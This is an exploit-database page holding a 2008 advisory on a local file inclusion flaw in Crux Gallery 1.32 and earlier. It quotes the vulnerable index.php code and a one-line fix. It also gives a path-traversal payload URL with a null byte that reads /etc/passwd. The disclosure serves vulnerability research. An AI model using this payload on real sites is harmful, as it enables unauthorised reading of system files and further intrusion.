[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Crux Gallery <= 1.32 (index.php theme) Local File Inclusion Vulnerability

Author
StAkeR
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3818
Category
web applications
Date add
30-09-2008
Platform
unsorted
=========================================================================
Crux Gallery <= 1.32 (index.php theme) Local File Inclusion Vulnerability
=========================================================================


 ~~+=========================================================+~~
 ~~+=========================================================+~~
  [!] Crux Gallery <= 1.32 Local File Inclusion Vulnerability
  [?] Discovered On: 01/10/2008
  [*] PHP.ini 
  [*] Magic_Quotes_Gpc = Off
 ~~+=========================================================+~~
  (index.php) // Greetz -> Osirys and darkjoker
  14. $m = $_GET['m'];
  15. $p = $_GET['p'];
  16. $dir = $_GET['dir'];
  17. require_once("main.php");
  18. require_once("themes/".$theme."/theme.php"); 
  $theme  isn't declared, so you can include any file.
  [*] http//[path]/index.php?theme=../../../../../etc/passwd%00
  [*] How To Fix: declare $theme
  ~~+=========================================================+~~




#  0day.today [2024-12-25]  #